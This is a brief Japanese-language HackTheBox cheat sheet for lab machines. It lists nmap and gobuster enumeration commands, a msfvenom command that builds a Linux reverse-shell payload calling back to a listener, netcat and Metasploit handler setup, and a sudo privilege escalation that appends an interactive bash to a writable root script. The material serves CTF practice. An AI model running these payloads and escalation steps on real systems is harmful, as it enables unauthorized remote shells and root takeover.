HTB CheatSheet

Enumeration

Nmap

ポートの特定を行う。

nmap -sC -sV -oN nmap/initial $IP

Gobuster

Webサーバが公開しているファイルやディレクトリの特定を行う。

gobuster dir -u http://${IP} -w /usr/share/wordlists/dirb/common.txt 

gobuster dir -u http://${IP} -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt -k

Nikto

Foothold

Create Payload

ペイロードを作成する。

msfvenom -p linux/x64/shell_reverse_tcp LHOST=172.0.0.1 LPORT=4444 -f elf -o shell.elf

Reverse Shell

作成したペイロードを実行し、リバースシェルを確立する。

nc -lvnp 4444

msfconsole
use exploit/multi/handler
set payload linux/x64/shell_reverse_tcp
run (exploit)

Privilege Escalation

Linux

sudo権限の確認を行う。

sudo -l

上のコマンドで、(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh という結果が得られた場合、monitor.shを編集することで、root権限でコマンドを実行できる。

echo "/bin/bash -i" >> /home/nibbler/personal/stuff/monitor.sh
sudo ./monitor.sh